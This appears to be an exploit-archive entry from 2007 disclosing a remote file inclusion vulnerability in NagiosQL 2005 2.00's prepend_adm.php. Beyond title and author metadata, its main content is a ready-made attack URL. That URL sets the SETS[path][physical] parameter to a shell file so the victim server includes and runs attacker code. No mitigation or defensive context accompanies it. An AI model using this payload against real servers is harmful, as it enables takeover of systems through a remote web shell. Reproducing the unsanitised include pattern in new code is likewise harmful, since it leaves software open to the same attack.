[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : NagiosQL 2005 2.00 (prepend_adm.php) Remote File Inclusion Vuln
# Published : 2007-05-14
# Author : ThE TiGeR
# Previous Title : EfesTECH Haber 5.0 (id) Remote SQL Injection Vulnerability
# Next Title : Feindt Computerservice News 2.0 (newsadmin.php action) RFI Vuln
#NagiosQL Remote file inclusion
#Download script : http://dfn.dl.sourceforge.net/sourceforge/nagiosql/nagiosql-2.00-P00.tar.gz
#Thanks str0ke
#Exploit :
#http://victim.com/[nagiosQL_path]/functions/prepend_adm.php?SETS[path][physical]=shell.txt?
#Discovered by ThE TiGeR
#Miro_Tiger100[at]Hotmail[dot]com
# www.Syue.com [2007-05-14]